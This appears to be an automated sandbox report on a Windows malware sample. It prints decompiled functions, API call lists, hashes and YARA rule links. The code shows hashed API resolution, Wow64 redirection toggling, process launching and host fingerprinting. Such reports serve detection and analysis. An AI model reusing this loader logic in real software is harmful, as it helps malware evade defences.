                                • Opcode Fuzzy Hash: b0a231fc5e8ef44f9b8a903dcc9308a04c28d019e34d4799fb6e7130c1a5cf65
                                • Instruction Fuzzy Hash: C5516DB1901229BADF109FD5DC849EEBFFCEF09360F244566E514A2280D775AE84CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04195927, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 27%
                                			E04195927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x419a38c; // 0x0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E04194E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x41991ac;
				}
				_t46 = E041942F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E04196837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x419a2d4; // 0x0
						_t16 = _t75 + 0x419baa8; // 0x70318002
						 *0x419a138(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E04194E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x41991b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E04196837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E041950CA(_v20);
						} else {
							_t66 =  *0x419a2d4; // 0x0
							_t31 = _t66 + 0x419bbc8; // 0xb9d63b8e
							 *0x419a138(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E041950CA(_v12);
				}
				return _v24;
			}




























                                0x0419592f
                                0x04195935
                                0x0419593c
                                0x04195942
                                0x04195946
                                0x0419594a
                                0x0419594d
                                0x04195954
                                0x04195957
                                0x04195959
                                0x04195959
                                0x04195962
                                0x04195969
                                0x0419596c
                                0x04195972
                                0x0419597c
                                0x04195985
                                0x0419598c
                                0x041959a5
                                0x041959ac
                                0x041959af
                                0x041959b8
                                0x041959c1
                                0x041959d2
                                0x041959db
                                0x041959df
                                0x041959e3
                                0x041959ea
                                0x041959ed
                                0x041959ef
                                0x041959ef
                                0x041959f9
                                0x04195a02
                                0x04195a09
                                0x04195a21
                                0x04195a25
                                0x04195a62
                                0x04195a27
                                0x04195a2a
                                0x04195a32
                                0x04195a43
                                0x04195a4f
                                0x04195a57
                                0x04195a5b
                                0x04195a5b
                                0x04195a25
                                0x04195a6a
                                0x04195a6f
                                0x04195a76

                                APIs
                                • GetTickCount.KERNEL32 ref: 0419593C
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 0419597C
                                • lstrlen.KERNEL32(00000000), ref: 04195985
                                • lstrlen.KERNEL32(00000000), ref: 0419598C
                                • lstrlenW.KERNEL32(80000002), ref: 04195999
                                • lstrlen.KERNEL32(?,00000004), ref: 041959F9
                                • lstrlen.KERNEL32(?), ref: 04195A02
                                • lstrlen.KERNEL32(?), ref: 04195A09
                                • lstrlenW.KERNEL32(?), ref: 04195A10
                                  • Part of subcall function 041950CA: HeapFree.KERNEL32(00000000,00000000,04194239,00000000,00000001,?,00000000,?,?,?,04196B8D,00000000,?,00000001), ref: 041950D6
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: 297b62fc4be1dfcebd73dadc888e527e95f5d21583e9e3cd1e6718ae623c0ed4
                                • Instruction ID: faa319793125fd46320a373e09045512ec33b41d4b5979e94612836188016cbc
                                • Opcode Fuzzy Hash: 297b62fc4be1dfcebd73dadc888e527e95f5d21583e9e3cd1e6718ae623c0ed4
                                • Instruction Fuzzy Hash: 4B415972900209BFCF12AFA5DD84A9E7BB5FF48318F050094ED04A7221DB35AE55EB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 041951A8, Relevance: 13.6, APIs: 9, Instructions: 110librarymemoryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 61%
                                			E041951A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E04194F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E041977A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x419a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x419a2d4; // 0x0
					_t18 = _t50 + 0x419b4a3; // 0x229b40a
					_t52 = E04196343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x419a2d4; // 0x0
						_t20 = _t53 + 0x419b770; // 0x419b770
						_t21 = _t53 + 0x419b0af; // 0xee60505d
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x419a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E041950CA(_t76);
				goto L12;
			}



















                                0x041951b1
                                0x041951b1
                                0x041951bf
                                0x041951c8
                                0x041951cb
                                0x041952dd
                                0x041952e4
                                0x041952e4
                                0x041951da
                                0x041951e2
                                0x041951e7
                                0x041951ea
                                0x041951ff
                                0x04195205
                                0x04195206
                                0x04195209
                                0x0419520f
                                0x04195212
                                0x04195217
                                0x0419521f
                                0x04195226
                                0x0419522d
                                0x04195230
                                0x041952c4
                                0x04195236
                                0x04195236
                                0x0419523b
                                0x04195242
                                0x04195256
                                0x0419525a
                                0x041952ab
                                0x0419525c
                                0x0419525c
                                0x04195263
                                0x0419526a
                                0x04195282
                                0x04195288
                                0x0419528c
                                0x041952a6
                                0x0419528e
                                0x04195297
                                0x0419529c
                                0x0419529c
                                0x0419528c
                                0x041952bc
                                0x041952bc
                                0x04195230
                                0x041952cb
                                0x041952d4
                                0x041952d8
                                0x00000000

                                APIs
                                  • Part of subcall function 04194F5A: GetModuleHandleA.KERNEL32(E66068DB,00000020,74183966,00000000,00000000,?,?,?,041951C4,?,?,?,?,00000000,00000000), ref: 04194F7F
                                  • Part of subcall function 04194F5A: GetProcAddress.KERNEL32(00000000,A8E5FD73), ref: 04194FA1
                                  • Part of subcall function 04194F5A: GetProcAddress.KERNEL32(00000000,94BA1371), ref: 04194FB7
                                  • Part of subcall function 04194F5A: GetProcAddress.KERNEL32(00000000,A3348E43), ref: 04194FCD
                                  • Part of subcall function 04194F5A: GetProcAddress.KERNEL32(00000000,45DAC78A), ref: 04194FE3
                                  • Part of subcall function 04194F5A: GetProcAddress.KERNEL32(00000000,23A90951), ref: 04194FF9
                                • memset.NTDLL ref: 04195212
                                  • Part of subcall function 04196343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0419522B,0229B40A), ref: 04196354
                                  • Part of subcall function 04196343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0419636E
                                • GetModuleHandleA.KERNEL32(EE60505D,0419B770,0229B40A), ref: 04195249
                                • GetProcAddress.KERNEL32(00000000), ref: 04195250
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0419526A
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04195288
                                • CloseHandle.KERNEL32(00000000), ref: 04195297
                                • CloseHandle.KERNEL32(?), ref: 0419529C
                                • GetLastError.KERNEL32 ref: 041952A0
                                • HeapFree.KERNEL32(00000000,?), ref: 041952BC
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                • String ID:
                                • API String ID: 91923200-0
                                • Opcode ID: 34b2c470896126d0fdf93c7c4a91588cf1027fad091defbba3b6cfad4ceb39dd
                                • Instruction ID: c0bd4febd7e8cb7aef6afdab0a0517abc404d5aca7076bf42939e43ca9e297a4
                                • Opcode Fuzzy Hash: 34b2c470896126d0fdf93c7c4a91588cf1027fad091defbba3b6cfad4ceb39dd
                                • Instruction Fuzzy Hash: F1314772900219FFDF16AFE5D888A9EBFB9FF08340F144095E509A3210D775AE85DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04196384, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 73%
                                			E04196384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04197D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x419a2d4; // 0x0
				_t5 = _t13 + 0x419b8a2; // 0x419b8a2
				_t6 = _t13 + 0x419b57c; // 0x275ca0c8
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04197A6A();
				_t30 = CreateFileMappingW(0xffffffff, 0x419a2f8, 4, 0, 0x1000,  &_v56);
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0);
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}












                                0x04196384
                                0x0419638c
                                0x04196390
                                0x04196396
                                0x0419639b
                                0x041963a0
                                0x041963a3
                                0x041963a6
                                0x041963ab
                                0x041963ac
                                0x041963af
                                0x041963b4
                                0x041963bb
                                0x041963c5
                                0x041963c7
                                0x041963c8
                                0x041963cb
                                0x041963ed
                                0x041963f1
                                0x0419643f
                                0x041963f3
                                0x04196400
                                0x04196410
                                0x04196418
                                0x0419642a
                                0x0419642e
                                0x00000000
                                0x00000000
                                0x0419641a
                                0x0419641d
                                0x04196422
                                0x04196424
                                0x04196424
                                0x04196402
                                0x04196404
                                0x04196430
                                0x04196431
                                0x04196431
                                0x04196400
                                0x04196446

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,04195488,?,00000001,8B330082,00000001,0419A2FC,00000000,?), ref: 04196390
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 041963A6
                                • _snwprintf.NTDLL ref: 041963CB
                                • CreateFileMappingW.KERNEL32(000000FF,0419A2F8,00000004,00000000,00001000,?), ref: 041963E7
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04195488,?,00000001,8B330082,00000001,0419A2FC), ref: 041963F9
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,04195488), ref: 04196410
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,04195488,?,00000001,8B330082,00000001), ref: 04196431
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04195488,?,00000001,8B330082,00000001,0419A2FC), ref: 04196439
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: 2f23c48b59f3abb47c81cb1fd2ae6ac21d4dc6ea5bba5a0d39229500217e19da
                                • Instruction ID: 2f65a72e1655fee2b046cba33cb586bf64a6cbb6d11f412f33d87c50b909edff
                                • Opcode Fuzzy Hash: 2f23c48b59f3abb47c81cb1fd2ae6ac21d4dc6ea5bba5a0d39229500217e19da
                                • Instruction Fuzzy Hash: 412102B2600214FBDB109BA5DC86F9E77F8EF44B50F244125F915E72C0EB70AD408B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04192902, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 0419295E
                                • SysAllocString.OLEAUT32(53327E6E), ref: 04192972
                                • SysAllocString.OLEAUT32(00000000), ref: 04192984
                                • SysFreeString.OLEAUT32(00000000), ref: 041929E8
                                • SysFreeString.OLEAUT32(00000000), ref: 041929F7
                                • SysFreeString.OLEAUT32(00000000), ref: 04192A02
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: a79152dfc30d3be2fae64d17aad3522adce9ac177e11b6e80788c2fd33ab0ffb
                                • Instruction ID: 5447e2f1887466fdf626ea7c29813fc7de73adf2f7092b623b1dfcdbc4b33185
                                • Opcode Fuzzy Hash: a79152dfc30d3be2fae64d17aad3522adce9ac177e11b6e80788c2fd33ab0ffb
                                • Instruction Fuzzy Hash: E8315B32D00609AFDF01DFA8D884A9EB7FAAF49310F1444A9ED14EB210DB75AD06CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04194454, Relevance: 9.1, APIs: 6, Instructions: 102memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E04194454(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x419a2c8; // 0x0
					_v12 = _t59;
				}
				_t64 = _t69;
				E0419143F( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x419a2d0 ^ 0x4c0ca0ae;
				} else {
					 *0x419a0e4(0,  &_v8);
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x419a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							_push( &_v8);
							_push(_t62);
							if( *0x419a0e4() != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E0419283A(_v8 + _v8, _t63);
							}
							HeapFree( *0x419a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x419a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E0419283A(_v8 + _v8, _t63);
						}
						HeapFree( *0x419a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                0x04194454
                                0x0419445c
                                0x04194462
                                0x04194465
                                0x04194468
                                0x0419446a
                                0x0419446f
                                0x0419446f
                                0x04194475
                                0x04194477
                                0x04194484
                                0x041944e5
                                0x04194486
                                0x0419448b
                                0x04194491
                                0x04194496
                                0x041944a4
                                0x041944a8
                                0x041944ad
                                0x041944ae
                                0x041944b7
                                0x041944be
                                0x041944c5
                                0x041944c5
                                0x041944d0
                                0x041944d0
                                0x041944a8
                                0x04194496
                                0x041944e7
                                0x041944ed
                                0x041944f7
                                0x041944f9
                                0x041944fe
                                0x0419450d
                                0x04194511
                                0x0419451c
                                0x04194523
                                0x0419452a
                                0x0419452a
                                0x04194536
                                0x04194536
                                0x04194511
                                0x0419453f
                                0x04194541
                                0x04194544
                                0x04194546
                                0x04194549
                                0x0419454c
                                0x04194556
                                0x0419455a
                                0x0419455e

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,041955CE), ref: 041944A2
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,041955CE,?,?,?,?,?,04196BD8,?,00000001), ref: 041944D0
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 041944F7
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0419450B
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04194518
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04194536
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocateComputerFreeName
                                • String ID:
                                • API String ID: 3439771632-0
                                • Opcode ID: 095b4fe652be3ba2841b8b75bb43c5f9158781ba247388b7459133befe49d5d1
                                • Instruction ID: a039880456caa65e969565b4d3e085d95ec42ce171aea42d4a44281969b3c935
                                • Opcode Fuzzy Hash: 095b4fe652be3ba2841b8b75bb43c5f9158781ba247388b7459133befe49d5d1
                                • Instruction Fuzzy Hash: 8E313A72A14209EFEB21DFAAD9C0A6EB7F9FF48344F144469E505D3210DB35EE459B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04194F5A, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04194F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04196837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x419a2d4; // 0x0
					_t1 = _t23 + 0x419b11a; // 0xe66068db
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x419a2d4; // 0x0
					_t2 = _t26 + 0x419b792; // 0xa8e5fd73
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E041950CA(_t54);
					} else {
						_t30 =  *0x419a2d4; // 0x0
						_t5 = _t30 + 0x419b77f; // 0x94ba1371
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x419a2d4; // 0x0
							_t7 = _t33 + 0x419b74e; // 0xa3348e43
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x419a2d4; // 0x0
								_t9 = _t36 + 0x419b72e; // 0x45dac78a
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x419a2d4; // 0x0
									_t11 = _t39 + 0x419b7a2; // 0x23a90951
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04194248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                0x04194f69
                                0x04194f6d
                                0x0419502f
                                0x04194f73
                                0x04194f73
                                0x04194f78
                                0x04194f8b
                                0x04194f8d
                                0x04194f92
                                0x04194f9a
                                0x04194fa1
                                0x04194fa5
                                0x04194fa8
                                0x04195027
                                0x04195028
                                0x04194faa
                                0x04194faa
                                0x04194faf
                                0x04194fb7
                                0x04194fbb
                                0x04194fbe
                                0x00000000
                                0x04194fc0
                                0x04194fc0
                                0x04194fc5
                                0x04194fcd
                                0x04194fd1
                                0x04194fd4
                                0x00000000
                                0x04194fd6
                                0x04194fd6
                                0x04194fdb
                                0x04194fe3
                                0x04194fe7
                                0x04194fea
                                0x00000000
                                0x04194fec
                                0x04194fec
                                0x04194ff1
                                0x04194ff9
                                0x04194ffd
                                0x04195000
                                0x00000000
                                0x04195002
                                0x04195008
                                0x0419500d
                                0x04195014
                                0x0419501b
                                0x0419501e
                                0x00000000
                                0x04195020
                                0x04195023
                                0x04195023
                                0x0419501e
                                0x04195000
                                0x04194fea
                                0x04194fd4
                                0x04194fbe
                                0x04194fa8
                                0x0419503d

                                APIs
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • GetModuleHandleA.KERNEL32(E66068DB,00000020,74183966,00000000,00000000,?,?,?,041951C4,?,?,?,?,00000000,00000000), ref: 04194F7F
                                • GetProcAddress.KERNEL32(00000000,A8E5FD73), ref: 04194FA1
                                • GetProcAddress.KERNEL32(00000000,94BA1371), ref: 04194FB7
                                • GetProcAddress.KERNEL32(00000000,A3348E43), ref: 04194FCD
                                • GetProcAddress.KERNEL32(00000000,45DAC78A), ref: 04194FE3
                                • GetProcAddress.KERNEL32(00000000,23A90951), ref: 04194FF9
                                  • Part of subcall function 04194248: memset.NTDLL ref: 041942C7
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: 0388055c99c088aebb3cd633c375a7efae8e44dc0dc7f74b90fdbed9b52c5cc4
                                • Instruction ID: ae6cd57c11df0cf9c79f381f01000c5862c8700088f3a95bfb2cf1ef957354b6
                                • Opcode Fuzzy Hash: 0388055c99c088aebb3cd633c375a7efae8e44dc0dc7f74b90fdbed9b52c5cc4
                                • Instruction Fuzzy Hash: 20217AB260024ABFDB24DF69E884E5A77ECEF08684B094165E808D7201E739FD05DFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04196BE1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                Download Yara Rule
                                C-Code - Quality: 32%
                                			E04196BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E04192902(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x419a2d4; // 0x0
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x419b4c8; // 0x53327e6e
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x419b8f8; // 0x212e7742
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x419a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}
















                                0x04196be1
                                0x04196be8
                                0x04196bec
                                0x04196bf1
                                0x04196bf8
                                0x04196bfb
                                0x04196c05
                                0x04196c0a
                                0x04196c16
                                0x04196c1d
                                0x04196c27
                                0x04196c27
                                0x04196c1f
                                0x04196c1f
                                0x04196c1f
                                0x04196c1f
                                0x04196c2d
                                0x04196c30
                                0x04196c38
                                0x04196c3b
                                0x04196c3e
                                0x04196c41
                                0x04196c46
                                0x04196c4f
                                0x04196c5c
                                0x04196c51
                                0x04196c57
                                0x04196c57
                                0x04196c62
                                0x04196c62
                                0x04196c6a

                                APIs
                                  • Part of subcall function 04192902: SysAllocString.OLEAUT32(?), ref: 0419295E
                                  • Part of subcall function 04192902: SysAllocString.OLEAUT32(53327E6E), ref: 04192972
                                  • Part of subcall function 04192902: SysAllocString.OLEAUT32(00000000), ref: 04192984
                                  • Part of subcall function 04192902: SysFreeString.OLEAUT32(00000000), ref: 041929E8
                                • memset.NTDLL ref: 04196C05
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 04196C41
                                • GetLastError.KERNEL32 ref: 04196C51
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04196C62
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
